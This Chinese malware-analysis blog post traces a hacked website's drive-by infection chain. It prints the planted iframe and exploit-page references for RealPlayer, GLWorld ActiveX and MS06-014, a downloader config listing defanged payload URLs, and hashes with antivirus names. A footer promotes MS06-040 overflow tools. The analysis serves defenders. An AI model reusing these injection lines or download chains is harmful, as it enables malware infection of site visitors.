一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
endurer 原创
2008-02-13 第1版
一位网友反映说他所管理的网站出了问题,打开任一网页,杀毒软件就报病毒。
检查该网站的网代码,发现:
/---
<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></iframe>
---/
1 hxxp://xxx.hu*i**la**ib*a*.info/104.htm
包含代码:
/---
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/real.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/lz.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/614.htm"></iframe>
---/
1.1 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/real.htm
利用realplayer漏洞下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe
文件说明符 : D:/test/fa.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 16:5:39
修改时间 : 2008-2-13 16:5:40
访问时间 : 2008-2-13 16:6:58
大小 : 12552 字节 12.264 KB
MD5 : 6b0871a3aa90420f839ce5eecd1ddf94
SHA1: 674E363647AD7AB93176ECA70A33FBFCFC355C3D
CRC32: 3e6d13ca
会释放驱动 drivers/pcihdd2.sys,文件TIMPlatform.exe、userinit.exe。并根据hxxp://a**a*a.hu*i**la**ib*a*.info/c**e*shi**/fa.txt下载新版本:
/---
[CONTROL]
VERSION=2008-2-9
[DOWN]
NEWVERSION=hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/gx.exe
1=hxxp://xxx.hu*i**la**ib*a*.info/ww/11.exe
2=hxxp://xxx.hu*i**la**ib*a*.info/ww/12.exe
3=hxxp://xxx.hu*i**la**ib*a*.info/ww/13.exe
4=hxxp://xxx.hu*i**la**ib*a*.info/ww/14.exe
5=hxxp://xxx.hu*i**la**ib*a*.info/ww/15.exe
6=hxxp://xxx.hu*i**la**ib*a*.info/ww/16.exe
7=hxxp://xxx.hu*i**la**ib*a*.info/ww/17.exe
8=hxxp://xxx.hu*i**la**ib*a*.info/ww/18.exe
9=hxxp://xxx.hu*i**la**ib*a*.info/ww/19.exe
10=hxxp://xxx.hu*i**la**ib*a*.info/ww/20.exe
11=hxxp://*60.190.216.*12/ww/21.exe
12=hxxp://*60.190.216.*12/ww/22.exe
13=hxxp://*60.190.216.*12/ww/23.exe
14=hxxp://*60.190.216.*12/ww/24.exe
15=hxxp://*60.190.216.*12/ww/25.exe
16=hxxp://*60.190.216.*12/ww/26.exe
17=hxxp://*60.190.216.*12/ww/27.exe
18=hxxp://*60.190.216.*12/ww/28.exe
19=hxxp://*60.190.216.*12/ww/29.exe
20=hxxp://*60.190.216.*12/ww/30.exe
21=hxxp://*60.190.216.*12/ww/31.exe
22=hxxp://*60.190.216.*12/ww/32.exe
23=hxxp://*60.190.216.*12/ww/33.exe
---/
文件说明符 : D:/test/11.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:6:50
修改时间 : 2008-2-13 18:6:50
访问时间 : 2008-2-13 17:38:47
大小 : 24504 字节 23.952 KB
MD5 : 0954e96e6874639c9289683739588b71
SHA1: C01933808D2C9A8B94228A22983ACC63BB0A7197
CRC32: 8d044e32
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/12.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:7:32
修改时间 : 2008-2-13 18:7:36
访问时间 : 2008-2-13 18:7:44
大小 : 18336 字节 17.928 KB
MD5 : 69a4ce8ebf88e7124fb62b93f11e0d41
SHA1: D8E092C49AE3D463DA35CC89489A806A26CDFB94
CRC32: e2794881
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qnk,瑞星报为 Trojan.PSW.Win32.GameOL.lvx
文件说明符 : D:/test/13.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:9:2
修改时间 : 2008-2-13 18:9:2
访问时间 : 2008-2-13 18:9:38
大小 : 18452 字节 18.20 KB
MD5 : 301ee0fc94f9270ba5147bec7fd531fc
SHA1: DECE439E84488AAF869AB32E41149B9D825C7CFA
CRC32: 9e59252d
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/14.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:10:17
修改时间 : 2008-2-13 18:10:17
访问时间 : 2008-2-13 18:10:22
大小 : 21360 字节 20.880 KB
MD5 : cb6969b4a466e04377efcc05e52dd9f9
SHA1: 52CB364E57BB2C568E8A463E070C8DD3EFF49352
CRC32: e0612093
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/15.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:12:23
修改时间 : 2008-2-13 18:12:23
访问时间 : 2008-2-13 18:12:31
大小 : 19300 字节 18.868 KB
MD5 : ab7b502fd6c1275535d3a5c0f76cc077
SHA1: 74539522121111409C34CB0C44823677CC6A7FB2
CRC32: 1f9cd601
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz
文件说明符 : D:/test/16.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:18:8
修改时间 : 2008-2-13 18:18:8
访问时间 : 2008-2-13 17:54:51
大小 : 23332 字节 22.804 KB
MD5 : 7fe3e49f7aa21370ad5b9903d2878c5e
SHA1: 2F36391D16289795F49119D2239C4AD60495BD28
CRC32: bf616978
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pud,瑞星报为 Trojan.PSW.Win32.ZhengTu.ymy
文件说明符 : D:/test/17.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:19:28
修改时间 : 2008-2-13 18:19:28
访问时间 : 2008-2-13 18:19:33
大小 : 18584 字节 18.152 KB
MD5 : be28d24eaaf864f34733629bfb1036d7
SHA1: ECD109C09DB6F79B0C33BDE07499129A19245609
CRC32: b548febf
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/18.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:21:7
修改时间 : 2008-2-13 18:21:7
访问时间 : 2008-2-13 18:21:8
大小 : 19304 字节 18.872 KB
MD5 : fc46949ddab4837377bdef45dae888d9
SHA1: 2357A48E60BA86B6E23C0F20EC12210CF34C9171
CRC32: bd7433c4
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz
文件说明符 : D:/test/19.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:13
修改时间 : 2008-2-13 18:22:13
访问时间 : 2008-2-13 18:24:8
大小 : 18824 字节 18.392 KB
MD5 : 5d8bb087e788dc90919763f59231e5f5
SHA1: B3B0C97715B6B431BFB904A783E360616CD9C4A5
CRC32: d6a01f42
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qnk,瑞星报为 Trojan.PSW.Win32.GameOL.lvx
文件说明符 : D:/test/20.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:19
修改时间 : 2008-2-13 18:22:17
访问时间 : 2008-2-13 18:24:8
大小 : 17956 字节 17.548 KB
MD5 : 3d779c93f9a1dbd6ec5ade69e58f5add
SHA1: 9953662B42072B5AE2264703B54604859B186552
CRC32: ecadcb14
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pry,瑞星报为 Trojan.PSW.Win32.XYOnline.abc
文件说明符 : D:/test/21.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:26
修改时间 : 2008-2-13 18:22:26
访问时间 : 2008-2-13 18:24:8
大小 : 18620 字节 18.188 KB
MD5 : 9bc243e13c042d66da1e69fa1f400f00
SHA1: A02192990F35A7ACC14579D995D5455A02D0F6C0
CRC32: ee76c082
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz,瑞星报为 Trojan.PSW.Win32.GameOL.lvx
文件说明符 : D:/test/22.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:33
修改时间 : 2008-2-13 18:22:33
访问时间 : 2008-2-13 18:24:8
大小 : 23232 字节 22.704 KB
MD5 : 2993d90fc8edb81a133aebe91fa5c877
SHA1: 296B205C710AD4EC7261B4C5E5C522029D283269
CRC32: 681deef5
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pzl,瑞星报为 Trojan.PSW.Win32.GamesOnline.mh
文件说明符 : D:/test/23.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:39
修改时间 : 2008-2-13 18:22:39
访问时间 : 2008-2-13 18:24:8
大小 : 18088 字节 17.680 KB
MD5 : 733f4e26662dd77474dc3196e8e8e01e
SHA1: 176DA1B70A64C055D6925E30B9C82C7267927204
CRC32: fdf8cc50
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pzl,瑞星报为 Trojan.PSW.Win32.GamesOnline.mh
文件说明符 : D:/test/24.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:46
修改时间 : 2008-2-13 18:22:46
访问时间 : 2008-2-13 18:24:8
大小 : 18248 字节 17.840 KB
MD5 : 8f8280b117acf67defc518a8d18bf121
SHA1: FE10A12370B50A2DB3C445839C52520C340F5A45
CRC32: 794cffd6
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz
文件说明符 : D:/test/25.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:50
修改时间 : 2008-2-13 18:22:50
访问时间 : 2008-2-13 18:24:8
大小 : 18836 字节 18.404 KB
MD5 : 4ba3bb2166514167e494be187dc3d8b1
SHA1: 8CE2F7365F7C2582684366365CE0F90BB90EC65F
CRC32: 35a1969f
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pbp,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/26.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:56
修改时间 : 2008-2-13 18:22:56
访问时间 : 2008-2-13 18:24:8
大小 : 19248 字节 18.816 KB
MD5 : e29465bdf544cc5f1db866a578d66c89
SHA1: 3296C45E6CF45151A4E07D24CEF7BB9585507DCA
CRC32: da8a4f3b
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pzl,瑞星报为 Trojan.PSW.Win32.GamesOnline.mh
文件说明符 : D:/test/27.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:0
修改时间 : 2008-2-13 18:23:1
访问时间 : 2008-2-13 18:24:8
大小 : 18281 字节 17.873 KB
MD5 : 5d0fb9ad3308914702951a7747b9ab15
SHA1: 774B1B79B1C103814BB09469EEE53B3EBF0D0AFE
CRC32: a330465d
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/28.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:6
修改时间 : 2008-2-13 18:23:6
访问时间 : 2008-2-13 18:24:8
大小 : 17351 字节 16.967 KB
MD5 : 2175ee2c7d73838c569c577cbc9d9096
SHA1: 942DC4628F37A7AD22AFE19E3EB8886743580241
CRC32: b1c8ac52
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/29.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:12
修改时间 : 2008-2-13 18:23:12
访问时间 : 2008-2-13 18:24:8
大小 : 18389 字节 17.981 KB
MD5 : cc20a85b4d0ea3aebac4e2ee9a850bda
SHA1: 3090C59C29297A6D9DD4032884D4F6F2D3F3CDEB
CRC32: af2f454e
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/30.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:18
修改时间 : 2008-2-13 18:23:18
访问时间 : 2008-2-13 18:24:8
大小 : 17832 字节 17.424 KB
MD5 : 98ac9873f6e6bbb33ddc9f2bedb8835d
SHA1: 44ACB3221214716E6E71FA2FE498FAECCE45AF22
CRC32: 198b88a2
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/31.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:25
修改时间 : 2008-2-13 18:23:25
访问时间 : 2008-2-13 18:24:8
大小 : 17548 字节 17.140 KB
MD5 : 014124061ebe4e646fe9956e7e6f232f
SHA1: 83E1B7111F5AAC7EB6799070FAD18DEF5DDC3A98
CRC32: 2c4fecba
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/32.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:32
修改时间 : 2008-2-13 18:23:32
访问时间 : 2008-2-13 18:24:8
大小 : 17800 字节 17.392 KB
MD5 : 29dae875fb311512c920ff9500d40abd
SHA1: 321894C94561174105F40BF947CE4CD2569F31F0
CRC32: 8f7ace0e
Kaspersky 报为 Trojan.Win32.Agent.fey
1.2 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/lz.htm
输出代码:
/---
<iframe width=50 height=1 src=lz1.htm></iframe>
---/
1.2.1 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/lz1.htm
利用 联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞 下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe
参考:http://www.nsfocus.net/vulndb/11465
1.3 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/614.htm
利用 MS06-014: msadco.dll 严重漏洞 下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe
分享到:
相关推荐
实训指导5.1.5操作系统漏洞攻击MS06-040(精)PPT文档.pptx
3. 漏洞利用漏洞的利用分为本地和远程两种,本地利用用于分析此导出函数存在的漏洞,在远程靠此漏洞进行恶意代码执行,进而控制存在此漏洞的主机 4. 漏洞影响此例中
深入浅出分析漏洞MS06-040,值得一看
如果您根据本文的指导亲手完成了全部的7节实验内容,相信您对栈溢出的掌握和漏洞利用的认识一定会到一个更高的level。
MS06-040溢出套装 MS06-040,溢出工具
信息安全技术基础
4、成功溢出的主机将会被添加到"溢出主机"的树形分枝中,每单击一个主机即可得到对 应的cmd shell.可以随时与溢出主机断开连接. 5、经过大量的测试,所有溢出代码均能适应不同主机上的操作系统,使溢出成功率达到90%...
黑客利用某系统漏洞〔如MS06-040〕进行远程渗透 C.嗅探 D.黑客攻击某企业门户网站,造成网站不可访问 正确答案:A; 16.以下内容不属于信息平安的"CIA〞属性的是 A.机密性 B.不可篡改性 C.完整性 D.可用性 正确答案...
黑客利用某系统漏洞〔如MS06-040〕进行远程渗透 C.嗅探 D.黑客攻击某企业门户,造成不可访问 正确答案:A; 16.下列内容不属于信息安全的"CIA"属性的是 A.##性 B.不可篡改性 C.完整性 D.可用性 正确答案:B; 17.在...
4、成功溢出的主机将会被添加到"溢出主机"的树形分枝中,每单击一个主机即可得到对 应的cmd shell.可以随时与溢出主机断开连接. 5、经过大量的测试,所有溢出代码均能适应不同主机上的操作系统,使溢出成功率达到90%...
MS06040漏洞扫描工具,若无法运行,尝试用windows2000兼容性运行。
4、成功溢出的主机将会被添加到"溢出主机"的树形分枝中,每单击一个主机即可得到对 应的cmd shell.可以随时与溢出主机断开连接. 5、经过大量的测试,所有溢出代码均能适应不同主机上的操作系统,使溢出成功率达到90%...
前天看到微软紧急发布了一个漏洞补丁,就去看了下,发现该漏洞影响覆盖面非常广, 包括Windows 2000/XP/2003/Vista/2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta,并且漏洞存在于Windows系统默认开启的...
网络安全课程设计报告(详细的报告),推荐大家下载。
下完补丁,发现被打补丁的又是 Netapi32.dll,对比原文件和补丁中的文件,有问题的函数又是 NetpwPathCanonicalize(MS06...该函数用于标准化一个路径,一般用于本地调用,若调用者指定了一个远程计算机名将会使用RPC。
MS06S与MT23L常见过孔问题案例.pptx
1: 如果SCCM站点服务器操作系统版本是Windows Server 2003 SP1,则需要安装:MMC 3.0与.Net Framework 2.0 、KB932303、MS06-030 ( 补丁),WSUS3.0 SP1 如果SCCM站点服务器操作系统版本是Windows Server 2003 SP2,...
MS06_040 MS05_039 MS12_020 OSVDB-73573 CVE-2017-5689 CVE-2012-1823 CVE-2006-2369 CVE-2009-3843 SMB Session Pipe Auditor Gathering GPP Saved Passwords Checks for multiple auxiliary modules 如果应用...